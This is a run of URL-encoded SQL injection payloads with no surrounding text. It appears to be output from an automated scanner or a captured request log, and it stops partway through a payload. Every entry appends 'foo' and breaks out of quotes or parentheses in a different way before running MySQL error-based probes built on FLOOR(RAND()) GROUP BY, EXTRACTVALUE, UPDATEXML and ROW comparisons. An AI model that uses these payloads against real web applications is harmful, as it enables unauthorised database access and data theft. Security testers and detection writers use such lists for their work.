foo%29%20WHERE%206464%3D6464%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%29%20WHERE%201179%3D1179%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%20WHERE%207767%3D7767%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%22%20WHERE%208918%3D8918%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%20%7C%7C%20%28SELECT%201490%20FROM%20DUAL%20WHERE%209172%3D9172%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201933%20WHERE%204018%3D4018%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%201015%20FROM%20DUAL%20WHERE%207095%3D7095%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29 foo%20%2B%20%28SELECT%205241%20WHERE%206438%3D6438%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29 foo%27%20%2B%20%28SELECT%20%27KnKu%27%20FROM%20DUAL%20WHERE%206652%3D6652%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27aZFO%27%20WHERE%203602%3D3602%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%23 foo%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%22%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%283129%3D3129 foo%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%284744%3D4744 foo%29%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%286191%3D6191 foo%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%27VvEe%27%3D%27VvEe foo%27%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%27Kcjr%27%3D%27Kcjr foo%27%29%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%28%27GzWy%27%3D%27GzWy foo%27%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%27rKio%27%3D%27rKio foo%27%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%27ztVe%27%20LIKE%20%27ztVe foo%27%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%27DNWL%27%20LIKE%20%27DNWL foo%27%29%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%28%27zxJW%27%20LIKE%20%27zxJW foo%27%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%27JUDc%27%20LIKE%20%27JUDc foo%22%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%22wwJx%22%3D%22wwJx foo%22%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%22AWnc%22%3D%22AWnc foo%22%29%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%28%22WpZW%22%3D%22WpZW foo%22%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%22LoKd%22%3D%22LoKd foo%22%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%22vYfV%22%20LIKE%20%22vYfV foo%22%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%22UPFJ%22%20LIKE%20%22UPFJ foo%22%29%29%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%28%28%28%22tNYa%22%20LIKE%20%22tNYa foo%22%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20AND%20%22WTuc%22%20LIKE%20%22WTuc foo%29%20WHERE%207699%3D7699%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%29%20WHERE%203279%3D3279%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%20WHERE%207320%3D7320%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%22%20WHERE%206690%3D6690%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%27%20%7C%7C%20%28SELECT%202685%20FROM%20DUAL%20WHERE%207250%3D7250%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202353%20WHERE%201426%3D1426%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%204174%20FROM%20DUAL%20WHERE%201285%3D1285%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29 foo%20%2B%20%28SELECT%203654%20WHERE%208903%3D8903%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27feAw%27%20FROM%20DUAL%20WHERE%201976%3D1976%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27nRhI%27%20WHERE%203590%3D3590%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20EXTRACTVALUE%282299%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%282299%3D2299%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%20%23 foo%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%27%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%27%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%22%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%284573%3D4573 foo%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%283045%3D3045 foo%29%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%288644%3D8644 foo%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%27%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%27plsq%27%3D%27plsq foo%27%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%27Qiuq%27%3D%27Qiuq foo%27%29%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%28%27mQCf%27%3D%27mQCf foo%27%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%27ZvyM%27%3D%27ZvyM foo%27%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%27PRzm%27%20LIKE%20%27PRzm foo%27%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%27Tyea%27%20LIKE%20%27Tyea foo%27%29%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%28%27eTun%27%20LIKE%20%27eTun foo%27%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%27hZoO%27%20LIKE%20%27hZoO foo%22%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%22zNlj%22%3D%22zNlj foo%22%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%22cyOk%22%3D%22cyOk foo%22%29%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%28%22uLOy%22%3D%22uLOy foo%22%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%22IzQV%22%3D%22IzQV foo%22%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%22MfBF%22%20LIKE%20%22MfBF foo%22%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%22UhnD%22%20LIKE%20%22UhnD foo%22%29%29%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%28%28%28%22ulle%22%20LIKE%20%22ulle foo%22%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20AND%20%22xxaw%22%20LIKE%20%22xxaw foo%29%20WHERE%209060%3D9060%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%27%29%20WHERE%208620%3D8620%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%27%20WHERE%202038%3D2038%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%22%20WHERE%205870%3D5870%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29 foo%27%20%7C%7C%20%28SELECT%207422%20FROM%20DUAL%20WHERE%203904%3D3904%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%207599%20WHERE%204415%3D4415%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%207752%20FROM%20DUAL%20WHERE%204985%3D4985%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20%29 foo%20%2B%20%28SELECT%203991%20WHERE%209960%3D9960%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20%29 foo%27%20%2B%20%28SELECT%20%27KfVT%27%20FROM%20DUAL%20WHERE%202749%3D2749%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27UjFH%27%20WHERE%203760%3D3760%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20UPDATEXML%281025%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281025%3D1025%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C7573%29%20%23 foo%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%27%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%27%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%22%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%285385%3D5385 foo%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%283927%3D3927 foo%29%29%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%287550%3D7550 foo%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29 foo%27%29%20AND%20ROW%285394%2C6605%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285394%3D5394%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205394%20UNION%20SELECT%206605%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27ysGp%27%3D%27ysGp 